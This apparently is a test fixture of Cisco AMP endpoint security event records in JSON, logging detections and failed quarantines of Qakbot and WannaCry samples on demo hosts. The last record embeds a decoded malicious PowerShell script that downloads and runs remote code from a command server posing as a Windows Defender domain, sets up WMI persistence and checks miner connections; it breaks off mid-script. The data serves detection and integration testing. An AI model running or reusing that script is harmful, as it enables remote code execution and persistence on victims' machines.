Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
